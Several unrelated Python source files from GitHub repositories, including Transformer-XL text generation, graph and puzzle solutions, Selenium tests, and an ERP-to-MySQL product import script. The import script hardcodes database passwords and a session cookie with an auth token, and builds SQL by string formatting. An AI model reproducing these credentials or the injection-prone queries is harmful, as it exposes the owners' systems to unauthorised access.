# Initializing a Transformer XL configuration
configuration = TransfoXLConfig.from_dict(model_config_base)
# To match with pre-trained model
configuration.d_embed, configuration.d_head = 512, 64
configuration.d_inner, configuration.d_model = 2048, 512
configuration.mem_len, configuration.n_head = 192, 8
configuration.n_layer, configuration.tgt_len = 16, 192
configuration.vocab_size = 32000
model = TransfoXLLMHeadModel.from_pretrained(pretrained_model_name_or_path=None, state_dict=ckpt['model_state'], config=configuration)
from transformers import PreTrainedTokenizer
from utils.tokenization_sentencepiece import FullTokenizer
from collections import Counter, OrderedDict
from os.path import join, exists
class Vocab(TransfoXLTokenizer):
def __init__(
self,
special=None,
min_freq=0,
max_size=None,
lower_case=False,
delimiter=None,
vocab_file='./data/mn_cased.vocab',
never_split=None,
unk_token="<unk>",
eos_token="</s>",
additional_special_tokens=["<formula>"],
**kwargs
):
super().__init__(
unk_token=unk_token, eos_token=eos_token, additional_special_tokens=additional_special_tokens, **kwargs
)
self.vocab_file = vocab_file
if vocab_file is not None:
self.build_vocab()
def tokenize(self, line, add_eos=False, add_double_eos=False):
tokenizer = FullTokenizer(model_file=join('./data', 'mn_cased.model'),
vocab_file=join('./data', 'mn_cased.vocab'), do_lower_case=False)
line = line.strip()
# convert to lower case
if self.lower_case:
line = line.lower()
# empty delimiter '' will evaluate False
if self.delimiter == '':
symbols = line
else:
symbols = tokenizer.tokenize(line)
if add_double_eos: # lm1b
return ['<S>'] + symbols + ['<S>']
elif add_eos:
return symbols + ['<eos>']
else:
return symbols
def _build_from_file(self, vocab_file):
self.idx2sym = []
self.sym2idx = OrderedDict()
with open(vocab_file, 'r') as f:
for line in f:
symb = line.strip().split()[0]
self.add_symbol(symb)
self.unk_idx = self.sym2idx['<unk>']
def build_vocab(self):
if self.vocab_file:
print('building vocab from {}'.format(self.vocab_file))
self._build_from_file(self.vocab_file)
print('final vocab size {}'.format(len(self)))
else:
print('building vocab with min_freq={}, max_size={}'.format(
self.min_freq, self.max_size))
self.idx2sym = []
self.sym2idx = OrderedDict()
for sym in self.special:
self.add_special(sym)
for sym, cnt in self.counter.most_common(self.max_size):
if cnt < self.min_freq: break
self.add_symbol(sym)
print('final vocab size {} from {} unique tokens'.format(
len(self), len(self.counter)))
model.to('cuda')
model.eval()
model.half()
cool_tokenizer = Vocab()
# reference - https://github.com/huggingface/transformers/blob/2ba147ecffa28e5a4f96eebd09dcd642117dedae/examples/run_generation.py
def text_generation(prompt_text, temp, topk, topp, beams, penalty, do_sample):
encoded_prompt = cool_tokenizer.encode(prompt_text, return_tensors="pt")
encoded_prompt = encoded_prompt.to('cuda')
output_sequences = model.generate(
input_ids=encoded_prompt,
max_length=20,
temperature=temp,
top_k=topk,
top_p=topp,
num_beams=beams,
repetition_penalty=penalty,
do_sample=do_sample,
)
# Batch size == 1. to add more examples please use num_return_sequences > 1
generated_sequence = output_sequences[0].tolist()
text = cool_tokenizer.decode(generated_sequence, skip_special_tokens=True, clean_up_tokenization_spaces=True)
text = [word.replace("▁", " ") for word in text.split()]
return ' '.join(text)
print(text_generation("УИХ ", temp=1.0, topk=5, topp=1, beams=1, penalty=1.0, do_sample=True)) | enod/Nvidia-Transformer-XL | pytorch/generate.py | generate.py | py | 5,024 | python | en | code | 5 | github-code | 36 |
37339861285 | import heapq
def make_graph():
# identical graph as the YouTube video: https://youtu.be/cplfcGZmX7I
# tuple = (cost, n1, n2)
return {
'A': [(3, 'D', 'A'), (3, 'C', 'A'), (2, 'B', 'A')],
'B': [(2, 'A', 'B'), (4, 'C', 'B'), (3, 'E', 'B')],
'C': [(3, 'A', 'C'), (5, 'D', 'C'), (6, 'F', 'C'), (1, 'E', 'C'), (4, 'B', 'C')],
'D': [(3, 'A', 'D'), (5, 'C', 'D'), (7, 'F', 'D')],
'E': [(8, 'F', 'E'), (1, 'C', 'E'), (3, 'B', 'E')],
'F': [(9, 'G', 'F'), (8, 'E', 'F'), (6, 'C', 'F'), (7, 'D', 'F')],
'G': [(9, 'F', 'G')],
}
def prims(G, start='A'):
unvisited = list(G.keys())
visited = []
total_cost = 0
MST = []
unvisited.remove(start)
visited.append(start)
heap = G[start]
heapq.heapify(heap)
while unvisited:
(cost, n2, n1) = heapq.heappop(heap)
new_node = None
if n1 in unvisited and n2 in visited:
new_node = n1
MST.append((n2, n1, cost))
elif n1 in visited and n2 in unvisited:
new_node = n2
MST.append((n1, n2, cost))
if new_node != None:
unvisited.remove(new_node)
visited.append(new_node)
total_cost += cost
for node in G[new_node]:
heapq.heappush(heap, node)
return MST, total_cost
def main():
G = make_graph()
MST, total_cost = prims(G, 'A')
print(f'Minimum spanning tree: {MST}')
print(f'Total cost: {total_cost}')
main()
| msambol/dsa | minimum_spanning_trees/prims.py | prims.py | py | 1,520 | python | en | code | 211 | github-code | 36 |
16673314825 | #!/usr/bin/python3
import numpy as np
input = []
folds = []
dims = [0, 0]
with open('13/input.txt', 'r') as f:
l = input
for line in f.readlines():
if line.count(',') > 0:
l = list(map(int, line.strip().split(',')))
for i in [0,1]:
if l[i] > dims[i]:
dims[i] = l[i]
input.append(l)
elif line.count('=') > 0:
l = line.strip().split('=')
folds.append([l[0][-1], int(l[1])])
for i in [0,1]:
dims[i] += 1
def printpaper(p):
s = ''
for i in range(len(p)):
s += '\n'
for j in range(len(p[0])):
if p[i][j]:
s += '#'
else:
s += '.'
print(s)
def foldy(paper, fold):
upper = paper[:][:fold]
lower = paper[:][fold+1:]
lower.reverse()
new_paper = []
for i in range(len(upper)):
npl = []
for j in range(len(upper[0])):
npl.append(upper[i][j] or lower[i][j])
new_paper.append(npl)
return new_paper
def fold(paper, fold):
if fold[0] == 'y':
return foldy(paper, fold[1])
else:
p = np.array(paper).T.tolist()
return np.array(foldy(p, fold[1])).T.tolist()
paper = [[False for x in range(dims[0])] for y in range(dims[1])]
for x, y in input:
paper[y][x] = True
npl = paper
for f in folds:
npl = fold(npl, f)
printpaper(npl)
| chaserobertson/advent | 2021/13/1.py | 1.py | py | 1,421 | python | en | code | 0 | github-code | 36 |
34526548926 | import numpy as np
import openpyxl as op
import pandas as pd
import pymysql
from sqlalchemy import create_engine
import requests
import datetime as dt
import os
import xlrd
def read_table(path):
wb = op.load_workbook(path)
ws = wb.active
df = pd.DataFrame(ws.values)
df = pd.DataFrame(df.iloc[1:].values, columns=df.iloc[0, :])
return df
def is_contain_chinese(check_str):
"""
判断字符串是否包含中文
"""
for ch in check_str:
if ord(ch) > 255:
return True
return False
def is_chinese(l):
"""
删除list里含有中文的字符串
:param l: 待检测的字符串list
:return: 删去中文字符串后的list
"""
res = []
for i in l:
try:
if not is_contain_chinese(i):
res.append(i)
except:
continue
return res
def trim(s):
"""
删除字符串首位空格
"""
if s == '':
return s
elif s[0] == ' ':
return trim(s[1:])
elif s[-1] == ' ':
return trim(s[:-1])
else:
return s
# 连接数据库
# engine = create_engine(
# 'mysql+pymysql://leiming:pQx2WhYhgJEtU5r@rm-2ze314ym42f9iq2xflo.mysql.rds.aliyuncs.com:3306/plutus')
# conn = pymysql.connect(host='rm-2ze314ym42f9iq2xflo.mysql.rds.aliyuncs.com',
# port=3306, user='leiming',
# passwd='pQx2WhYhgJEtU5r',
# db="plutus",
# charset='utf8')
# 连接数据库(测试)
engine = create_engine(
'mysql+pymysql://leiming:vg4wHTnJlbWK8SY@rm-2zeq92vooj5447mqzso.mysql.rds.aliyuncs.com:3306/plutus')
conn = pymysql.connect(host='rm-2zeq92vooj5447mqzso.mysql.rds.aliyuncs.com',
port=3306, user='leiming',
passwd='vg4wHTnJlbWK8SY',
db="plutus",
charset='utf8')
# 读取数据
PATH = '/Users/edz/Documents'
url ='https://erp.banmaerp.com/Product/Spu/ExportHandler'
data = 'filter=%7B%22CreateTime%22%3A%7B%22Sort%22%3A-1%7D%7D'
headers = {
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36',
'cookie': '.AspNetCore.Session=CfDJ8HFZt5KhGHxPrfAKn%2Fe35kaRpPerMJVnDOQnJCjicT8lyd81AtsUwStenh5nUMsWpyuS%2Bu38igf9ADjk2fhr6CYTk87TukhPs3Uqvid6CI4gSaSqYkM7fHDGw4xEnUKIIhoVh5nzaNU57l2OfpixmIgipBDXzggD1pciKOzkXQdc; Hm_lvt_9be79ac4f097e2a0be24ee6c088e921b=1603200345,1603247430; ERP.Token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJJRCI6Ijc1MjIiLCJOYW1lIjoi6Zu35pmT5pmoIiwiVXNlclR5cGUiOiIzIiwiT3duVXNlcklEIjoiNzA0MCIsImV4cCI6MTYzNDc5MzM3MSwiaXNzIjoiRVJQLmJhbm1hZXJwLmNvbSIsImF1ZCI6IkVSUC5iYW5tYWVycC5jb20ifQ.r5r1FrpMRa_yWr3qxuLnrJXUAZST_CC6V8nt2V-MbxM; Hm_lpvt_9be79ac4f097e2a0be24ee6c088e921b=1603257395'}
r = requests.post(url=url, headers=headers, data=data)
file_name = PATH + '/本地产品导出.xlsx'.format(dt.datetime.now().date())
with open(file_name, 'wb') as file:
file.write(r.content)
data_cp = read_table(file_name)
os.remove(file_name)
# 删除第一列主标题
if "本地产品" in data_cp.columns.tolist():
data_cp = pd.DataFrame(data_cp.iloc[1:].values, columns=data_cp.iloc[0, :])
print(data_cp.columns)
print(data_cp.head())
# 增加specs_one,specs_two,is_delete,category项
data_cp['specs_one'] = data_cp['规格']
data_cp['specs_two'] = data_cp['规格']
data_cp['is_delete'] = np.where(data_cp['状态'] == '已删除', 1, 0)
data_cp['category'] = data_cp['斑马类目']
# 删除spu 和sku状态为已删除的records
data_cp['delete'] = data_cp['is_delete']
data_cp['delete'] = np.where(data_cp['SPU状态'] == '已删除', 1, data_cp['delete'])
data_cp = data_cp[data_cp['delete'] != 1]
data_cp = data_cp.drop(columns='delete')
data_cp = data_cp.reset_index()
# 修改specs_one(color) specs_two(size) spu图集(用','分割)
for i in range(data_cp.shape[0]):
# 修改category为品类的根结点
data_cp.loc[i, 'category'] = str(data_cp.loc[i, 'category']).split('»')[-1]
data_cp.loc[i, 'SPU图集'] = data_cp.loc[i, 'SPU图集'].replace('\n', ',')
if len(data_cp.loc[i, 'specs_two'].split(';')) >= 2:
data_cp.loc[i, 'specs_two'] = data_cp.loc[i, 'specs_two'].split(';')[1]
data_cp.loc[i, 'specs_one'] = data_cp.loc[i, 'specs_one'].split(';')[0]
elif len(data_cp.loc[i, 'specs_two']) > 2 and data_cp.loc[i, 'specs_two'] != 'One Size':
data_cp.loc[i, 'specs_one'] = data_cp.loc[i, 'specs_one']
data_cp.loc[i, 'specs_two'] = np.nan
else:
data_cp.loc[i, 'specs_two'] = data_cp.loc[i, 'specs_two']
data_cp.loc[i, 'specs_one'] = np.nan
# size同类合并
data_cp['specs_two'] = np.where(
(data_cp['specs_two'] == 'One-Size') | (data_cp['specs_two'] == 'one-size') | (data_cp['specs_two'] == 'One Size'),
'One Size', data_cp['specs_two'])
# 得到size 和color的唯一值(用于创建product_attr表)
specs_two = data_cp['specs_two'].unique()
specs_one = data_cp['specs_one'].unique()
# 删除含有中文字符的值
specs_two = is_chinese(specs_two)
specs_one = is_chinese(specs_one)
for i in range(data_cp.shape[0]):
if data_cp.loc[i, '标题'].startswith('\"'):
data_cp.loc[i, '标题'] = data_cp.loc[i, '标题'].replace('\"','\'')
# 给数据库中product表插入数据:
"""
product 插入数据
"""
data_cp.to_excel('/Users/edz/Documents/data_cp.xlsx')
# 插入data_cp表中spu数据
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
# 以spu_code为primary key 进行插入数据
sql = "select spu_code from product where spu_code='{0}'".format(data_cp.loc[i, 'SPU编码'])
cursor.execute(sql)
r = cursor.fetchone()
if r is None:
sql = '''INSERT INTO product (product_name,spu_code, primary_image, add_time, product_images, zebra_spu_id) VALUES ("{0}",'{1}','{2}',now(),'{3}',{4})'''.format(
data_cp.loc[i, '标题'], data_cp.loc[i, 'SPU编码'], data_cp.loc[i, 'SPU图片'],
data_cp.loc[i, 'SPU图集'], int(data_cp.loc[i, '系统SPUID']))
engine.execute(sql)
else:
sql = '''UPDATE product SET product_name ="{0}",primary_image = "{2}",add_time=now(),product_images="{3}",zebra_spu_id={4} WHERE spu_code = "{1}"'''.format(
data_cp.loc[i, '标题'], data_cp.loc[i, 'SPU编码'], data_cp.loc[i, 'SPU图片'],
data_cp.loc[i, 'SPU图集'], int(data_cp.loc[i, '系统SPUID']))
engine.execute(sql)
print('刷完产品')
"""
更新data_cp表中的product_id
"""
# 取出刚刚写入数据库里的product表及其id,根据spu,插入到data_cp里
data_p_id = pd.read_sql_table('product', engine)
data_p_id = data_p_id[['id', 'spu_code']]
data_cp = data_cp.merge(data_p_id, left_on='SPU编码', right_on='spu_code')
# 给数据库中product attr表插入数据
# 插入color属性
"""
product_attr 插入数据
需要: specs_one, specs_two 两个关于color属性和size属性的table
"""
# for i in range(len(specs_one)):
# with conn.cursor() as cursor:
# sql = "select attr_name from product_attr where attr_name='{0}'".format(specs_one[i])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = "INSERT INTO product_attr (attr_name, parent_id, ancilla) VALUES ('{0}', 1, NULL)".format(
# specs_one[i])
# engine.execute(sql)
#
# # 插入size属性
# for i in range(len(specs_two)):
# with conn.cursor() as cursor:
# sql = "select attr_name from product_attr where attr_name='{0}'".format(specs_two[i])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = "INSERT INTO product_attr (attr_name, parent_id, ancilla) VALUES ('{0}', 2, NULL)".format(
# specs_two[i])
# engine.execute(sql)
"""
更新data_cp表中的specs_one_id和specs_two_id
删除data_cp中属性含有中文字,并把属性id同步到data_cp表中
"""
# 将插入完成后的product_attr表读出,
data_product_attr = pd.read_sql_table('product_attr', engine)
# 删除data_cp里,color或size属性带中文字符的records
for i in range(data_cp.shape[0]):
if not data_cp.loc[i, 'specs_one'] in specs_one:
data_cp.loc[i, 'specs_one'] = -1
if not data_cp.loc[i, 'specs_two'] in specs_two:
data_cp.loc[i, 'specs_two'] = -1
data_cp = data_cp[~((data_cp['specs_two'] == -1) | (data_cp['specs_one'] == -1))]
# 并且通过合并product_attr表,来获取每行size和color属性对应的属性id
cur = data_cp.merge(data_product_attr, left_on='specs_one', right_on='attr_name', how='left')
data_cp = cur.merge(data_product_attr, left_on='specs_two', right_on='attr_name', how='left')
data_cp = data_cp.astype(object).where(pd.notnull(data_cp), "NULL")
# 添加sku main进数据库:
"""
sku_main插入数据
需要data_cp(包括更新的product_id 和specs_id)
"""
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
# 以sku_code为primary key 进行插入数据,查看要插入的数据sku
sql = "select sku_code from sku_main where sku_code='{0}'".format(data_cp.loc[i, 'SKU编码'])
cursor.execute(sql)
r = cursor.fetchone()
# 如果返回为none,则说明该sku不存在于数据库,进行插入操作
if r is None:
sql = 'INSERT INTO sku_main (sku_code,product_id ,specs_one, specs_two, specs_three, ' \
'cost_price, cost_currency, sale_price, sale_currency,' \
'sku_style, primary_image, is_delete, add_time,' \
'secondary_images, weight, length, height, width, name,' \
'en_name, is_effective, zebra_sku_id) ' \
'VALUES ("{0}",{1},{2},{3},NULL,{4},"RMB",NULL,"USD",NULL,"{5}",{6},now(),"{7}",{8},{9},{10},{11},NULL,NULL, 1,{12})'.format(
data_cp.loc[i, 'SKU编码'], data_cp.loc[i, 'id_x'], data_cp.loc[i, 'id_y'], data_cp.loc[i, 'id'],
data_cp.loc[i, '成本价'], data_cp.loc[i, 'SKU图'], data_cp.loc[i, 'is_delete'],
data_cp.loc[i, 'SPU图集'], data_cp.loc[i, '重量'], data_cp.loc[i, '长'], data_cp.loc[i, '高'],
data_cp.loc[i, '宽'], int(data_cp.loc[i, 'SKUID']))
engine.execute(sql)
else:
sql = '''UPDATE sku_main SET product_id ={1},specs_one = {2},specs_two={3},cost_price={4},cost_currency="RMB", sale_currency = "USD",primary_image = "{5}",
is_delete= {6},add_time = now(),secondary_images = "{7}", weight = {8}, length = {9},height ={10}, width = {11}, is_effective = 1,zebra_sku_id = {12}
WHERE sku_code = "{0}"'''.format(
data_cp.loc[i, 'SKU编码'], data_cp.loc[i, 'id_x'], data_cp.loc[i, 'id_y'], data_cp.loc[i, 'id'],
data_cp.loc[i, '成本价'], data_cp.loc[i, 'SKU图'], data_cp.loc[i, 'is_delete'],
data_cp.loc[i, 'SPU图集'], data_cp.loc[i, '重量'], data_cp.loc[i, '长'], data_cp.loc[i, '高'],
data_cp.loc[i, '宽'], int(data_cp.loc[i, 'SKUID']))
engine.execute(sql)
print('刷完sku_main')
"""
插入product_tag表所有标签
需要data_cp中所有的标签集合
"""
# 设置tag list来储存所有标签属性(unique),剔除所有标签为空的records
tag = []
notnull_cp = data_cp[~(data_cp['标签'] == "NULL")]
for i in range(notnull_cp.shape[0]):
tag += str(notnull_cp.iloc[i, 4]).split(',')
tag = list(set(tag))
# 将得到的标签属性值导入到数据库的product_tag表中,得到tag对应的tag_id
# for i in range(len(tag)):
# with conn.cursor() as cursor:
# sql = '''SELECT * FROM product_tag WHERE tag_name = "{0}" '''.format(tag[i])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = '''INSERT INTO product_tag (tag_name, add_time) VALUES ("{0}",now())'''.format(tag[i])
# engine.execute(sql)
# 设置id list和tag list 将data_cp中的id和该id对应的多个tag组成二元tuple
tr_id = []
tr_tag = []
notnull_cp = notnull_cp.reset_index()
for i in range(notnull_cp.shape[0]):
if ',' not in str(notnull_cp.loc[i, '标签']):
tr_id.append(notnull_cp.loc[i, 'id_x'])
tr_tag.append(notnull_cp.loc[i, '标签'])
else:
for tags in str(notnull_cp.loc[i, '标签']).split(','):
if len(tags) > 1:
tr_id.append(notnull_cp.loc[i, 'id_x'])
tr_tag.append(tags)
tuples = list(zip(tr_id, tr_tag))
# 将这两列转化为dataframe
tr = pd.DataFrame(tuples, columns=['product_id', 'tags_name'])
# 删除重复项
tr = tr.drop_duplicates()
# 读出product_tag得到tag及其对应的id,将tag_id通过tag_name合并到product_id上
product_tag = pd.read_sql_table('product_tag', engine)
tr = tr.merge(product_tag, left_on='tags_name', right_on='tag_name', how='left')
tr = tr.dropna(subset=['id'])
tr = tr.reset_index()
"""
插入product_tag_relation表所有tag_id和product_id对应关系
需要tr表(有tag_id 和 product_id 以及 tag_name)
"""
# 将tag_id,product_id写入到product_tag_relation表
for i in range(tr.shape[0]):
with conn.cursor() as cursor:
sql = '''SELECT * FROM product_tag_relation WHERE tag_id = {0} and product_id = {1}'''.format(tr.loc[i, 'id'], tr.loc[i, 'product_id'])
cursor.execute(sql)
r = cursor.fetchone()
if r is None:
sql = '''INSERT INTO product_tag_relation (tag_id, product_id) VALUES ({0},{1})'''.format(
tr.loc[i, 'id'], tr.loc[i, 'product_id'])
engine.execute(sql)
print('刷完product_tag_relation')
"""
更新product中的supplier_id数据
需要supplier表和data_cp
"""
# 从数据库中读出供应商表,并筛选出supplier_name和对应的id
supplier = pd.read_sql_table('supplier', engine)
supplier = supplier[['id', 'supplier_name']]
supplier.rename(columns={'id': 'supplier_id'}, inplace=True)
# 将供应商id加到data_cp中,通过供应商名字
data_cp = data_cp.merge(supplier, left_on='默认供应商', right_on='supplier_name', how='left')
# 更新product表中的供应商id
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
try:
sql = 'UPDATE product SET supplier_id ={0} WHERE spu_code = "{1}"'.format(data_cp.loc[i, 'supplier_id'],
data_cp.loc[i, 'SPU编码'])
engine.execute(sql)
except:
continue
print('刷完product中supplier id')
# 从数据库中读出品类,并筛选出category_name和对应的id
category = pd.read_sql_table('product_category', engine)
category = category[['id', 'category_name']]
# 删除品类中的字符串的首位空格
for i in range(data_cp.shape[0]):
data_cp.loc[i, 'category'] = trim(data_cp.loc[i, 'category'])
category.rename(columns={'id': 'category_id'}, inplace=True)
# 将品类id对应带data_cp上通过category
data_cp = data_cp.merge(category, left_on='category', right_on='category_name', how='left')
# data_cp.to_excel('/Users/edz/Documents/data_cp.xlsx')
data_cp = data_cp.dropna(subset = ['category_id'])
data_cp = data_cp.reset_index()
"""
更新product表中的category_id
data_cp表中的category和product_category中的id
"""
# 更新product中的品类id
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
sql = 'UPDATE product SET product_category={0} WHERE spu_code = "{1}"'.format(data_cp.loc[i, 'category_id'],
data_cp.loc[i, 'SPU编码'])
engine.execute(sql)
print('刷完product中product category id')
# 从数据库product表中读取供应商id和产品id
sup = pd.read_sql_table('product', engine)
sup = sup[['id', 'supplier_id']]
sup = sup[~sup['supplier_id'].isnull()][['supplier_id', 'id']]
# 删除重复项
sup = sup.drop_duplicates()
sup = sup.reset_index()
"""
插入product_supplier表中supplier_id, product_id
需要product表获取product_id和supplier_id
"""
# 将供应商id和产品id导入到product_supplier表中
for i in range(sup.shape[0]):
with conn.cursor() as cursor:
sql = '''SELECT * FROM product_supplier WHERE supplier_id = {0} AND product_id = {1}'''.format(
sup.iloc[i, 0], sup.iloc[i, 1])
cursor.execute(sql)
r = cursor.fetchone()
if r is None:
sql = '''INSERT INTO product_supplier (supplier_id, product_id) VALUES ({0}, {1})'''.format(
sup.iloc[i, 0], sup.iloc[i, 1])
engine.execute(sql)
print('刷完product_supplier')
# 更新sku_id_code_dic数据库
sku_id_code_dic = data_cp[['SKUID', '系统SPUID', 'SKU编码', '成本价', '重量']]
sku_id_code_dic = sku_id_code_dic.drop_duplicates()
sku_id_code_dic = sku_id_code_dic.reset_index()
# for i in range(sku_id_code_dic.shape[0]):
# with conn.cursor() as cursor:
# # 以spu_id sku_id,为primary key 进行插入数据
# sql = "select sku_code from sku_id_code_dic where spu_id='{0}' and sku_id='{1}'".format(sku_id_code_dic.loc[i, '系统SPUID'],sku_id_code_dic.loc[i, 'SKUID'])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = '''INSERT INTO sku_id_code_dic (sku_id,spu_id, sku_code, sku_price, sku_weight) VALUES ({0},{1},'{2}',{3},{4})'''.format(
# int(sku_id_code_dic.loc[i, 'SKUID']), int(sku_id_code_dic.loc[i, '系统SPUID']), sku_id_code_dic.loc[i, 'SKU编码'],
# sku_id_code_dic.loc[i, '成本价'], sku_id_code_dic.loc[i, '重量'])
# engine.execute(sql)
url = 'https://erp.banmaerp.com/Stock/SelfInventory/ExportDetailHandler'
data = 'filter=%7B%22Quantity%22%3A%7B%22Sort%22%3A-1%7D%2C%22WarehouseID%22%3A%7B%22Value%22%3A%5B%22adac18f9-a30e-4a4b-937f-ac6700e80334%22%5D%7D%2C%22Pager%22%3A%7B%22PageSize%22%3A10000%2C%22PageNumber%22%3A1%7D%7D'
r = requests.post(url=url, headers=headers, data=data)
file_name = PATH + '/本地产品导出.xlsx'.format(dt.datetime.now().date())
with open(file_name, 'wb') as file:
file.write(r.content)
d = read_table(file_name)
print(d.head())
print(d.columns)
data = xlrd.open_workbook(file_name)
os.remove(file_name)
table = data.sheets()[0]
nrows = table.nrows
col_dic = {}
index = 1
cur_test = conn.cursor()
# 获取字段名称
for col_index in table.row(0):
col_dic[index] = col_index.value
index += 1
# 开始处理数据
for row in range(1, nrows):
print(row)
data_list = []
i = 1
col_item_dic = {}
# 获取一行数据
for col in table.row(row):
col_item_dic[col_dic[i]] = col.value
i += 1
# 判断货位是否存在
sql = '''select id from warehouse_location where warehouse_location_code='{0}' and warehouse_id = 1'''.format(col_item_dic['货位'])
cur_test.execute(sql)
r = cur_test.fetchone()
if r is None:
sql = '''insert into warehouse_location(warehouse_id, warehouse_location_code) values(1, '{0}')'''.format(col_item_dic['货位'])
print(sql)
cur_test.execute(sql)
location_id = conn.insert_id()
print('插入新货位成功')
print(location_id)
conn.commit()
else:
location_id = r[0]
print('刷完库位')
# # 判断是否有SKU
# get_sku_id_sql = '''select id from sku_main where sku_code = '{0}' '''.format(col_item_dic['本地SKU'])
# cur_test.execute(get_sku_id_sql)
# r = cur_test.fetchone()
# if r is None:
# print(col_item_dic['本地SKU'] + '不存在sku_main里面!!')
# continue
# else:
# sku_id = r[0]
# # 更新库存
# total_num = col_item_dic['库存总量'] if '库存总量' in col_item_dic else 'NULL'
# free_num = col_item_dic['合格空闲量'] if '合格空闲量' in col_item_dic else 'NULL'
# lock_num = col_item_dic['合格锁定量'] if '合格锁定量' in col_item_dic else 'NULL'
# imperfect_num = col_item_dic['残次总量'] if '残次总量' in col_item_dic else 'NULL'
#
# total_num = int(total_num) if total_num != '' else 'NULL'
# free_num = int(free_num) if free_num != '' else 'NULL'
# lock_num = int(lock_num) if lock_num != '' else 'NULL'
# imperfect_num = int(imperfect_num) if imperfect_num != '' else 'NULL'
#
# get_exist_stock = '''select id from warehouse_stock where sku_id={0} and warehouse_id = 1 and warehouse_location_id = {1}'''.format(sku_id, location_id)
# cur_test.execute(get_exist_stock)
# r = cur_test.fetchone()
# if r is None:
# insert_sql = '''insert into warehouse_stock(sku_id,warehouse_id,warehouse_location_id,total_num,free_num,lock_num,imperfect_num)
# values({0},1,{1},{2},{3},{4},{5})'''.format(sku_id, location_id, total_num, free_num, lock_num, imperfect_num)
# # print(insert_sql)
# cur_test.execute(insert_sql)
# conn_test.commit()
# else:
# update_sql = '''update warehouse_stock set total_num = {0}, free_num = {1}, lock_num = {2}, imperfect_num = {3}
# where sku_id = {4} and warehouse_id = {5} and warehouse_location_id = {6}'''.format(total_num, free_num, lock_num, imperfect_num, sku_id, 1, location_id)
# # print(update_sql)
# cur_test.execute(update_sql)
# conn_test.commit() | yourant/ERPdata_Transfer | products_transfer.py | products_transfer.py | py | 21,610 | python | en | code | 0 | github-code | 36 |
28849898421 | #The provided code stub will read in a dictionary containing key/value
#pairs of name:[marks] for a list of students. Print the average of the
#marks array for the student name provided, showing 2 places after the decimal.
#Input Format
#The first line contains the integer n, the number of students' records.
#The next n lines contain the names and marks obtained by a student, each
#value separated by a space. The final line contains query_name, the name
#of a student to query.
if __name__ == '__main__':
def readScores(listOfStudents):
line = list(input().split())
avScore = sum(map(float, line[1:])) / 3
name = line[0]
listOfStudents[name] = avScore
n = int(input())
listOfStudents = dict()
for i in range(n):
readScores(listOfStudents)
print('%.2f' % listOfStudents[input()])
| CHIRAG3899/Hackerrank | Python Hackerrank/11 Finding the percentage.py | 11 Finding the percentage.py | py | 874 | python | en | code | 0 | github-code | 36 |
6084331741 | import collections
def number_of_islands(grid):
# this problem can be approached by dfs/bfs approach
# base case
if not grid:
return 0
ROWS, COLS = len(grid), len(grid[0])
visit = set()
island = 0
def bfs(r, c):
# since bfs, need a queue
# append r, c immediately
queue = collections.deque()
queue.append((r, c))
visit.add((r,c))
while queue: # check until queue is empty after popping left
row, col = queue.popleft()
directions = [[1, 0], [-1, 0], [0, 1], [0, -1]]
for dr, dc in directions:
# store current cell by directions
r, c = row + dr, col + dc
# check if satisfies conditions
# 1. in bound
# 2. current cell = 1
# 3. (r,c) not visited yet
if r in range(ROWS) and c in range(COLS) and grid[r][c] == "1" and (r, c) not in visit:
# add to visit & queue
visit.add((r, c))
queue.append((r,c))
# outside of bfs, do nested loop and check if satisfies conditions cell = 1 & r, c not visited yet
for r in range(ROWS):
for c in range(COLS):
if grid[r][c] == "1" and (r,c) not in visit:
bfs(r,c)
island += 1
return island
| phuclinh9802/data_structures_algorithms | blind 75/number_of_islands.py | number_of_islands.py | py | 1,416 | python | en | code | 0 | github-code | 36 |
19933632487 | """
Your Library Page Testing
This script tests the Your Library Page functions and report the results to allure
This script requires `allure` and `pytest` be installed within the Python environment you are running this script in
"""
import time
import allure
import pytest
from Web_Testing.Pages.WebPlayerLibrary import WebPlayerLibrary
from Web_Testing.helperClasses import WebHelper
from Web_Testing.Pages.LoginPage import LoginPage
from Web_Testing.Pages.SignupPage import SignupPage
from Web_Testing.Pages.WebPlayerHome import WebPlayerHome
from Web_Testing.Pages.LoggedOutHome import LoggedOutHome
from selenium import webdriver
from Web_Testing.helperClasses import ConstantsClass
@allure.parent_suite("End to End testing")
@allure.suite("Your Library Page")
@allure.feature("Your Library Page")
@allure.severity(allure.severity_level.BLOCKER)
class TestWebPlayerLibrary:
driver = WebHelper().firefox_driver_init()
helper = WebHelper()
helper.set_driver(driver)
@pytest.yield_fixture
def setup_initial(self):
self.driver.get(WebHelper().get_login_url())
self.driver.maximize_window()
yield
self.driver.refresh()
@pytest.yield_fixture
def setup(self):
self.driver.get(self.helper.base_url + "webplayer/home")
self.driver.maximize_window()
yield
# self.driver.close()
@pytest.yield_fixture
def setup_final(self):
self.driver.get(self.helper.base_url + "webplayer/home")
self.driver.maximize_window()
yield
self.driver.close()
# Test #1 -> Your Library Button
@allure.severity(allure.severity_level.BLOCKER)
@allure.story("Testing Your Library Liked Songs Play Button")
@allure.title("Liked Songs Play Button")
@allure.description("Testing Your Library Liked Songs Play Button")
@pytest.mark.Do
@pytest.mark.YourLibrary
def test_case_1(self, setup_initial):
time.sleep(3)
lp = LoginPage(self.driver)
lp.login_to_spotify("test1@test.com", "test123")
time.sleep(3)
self.driver.get(self.helper.base_url + "webplayer/home")
time.sleep(3)
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_your_library()
time.sleep(2)
web_player_library = WebPlayerLibrary(self.driver)
if web_player_library.check_liked_songs_click():
self.helper.report_allure("SUCCESS: Your Library Liked songs cards are functional")
assert True
else:
self.helper.report_allure("FAILURE: Your Library Liked songs cards are not functional")
assert False
# Test #2 -> Playlists Cards
@allure.severity(allure.severity_level.BLOCKER)
@allure.story("Testing Your Library playlists cards")
@allure.title("Playlists cards")
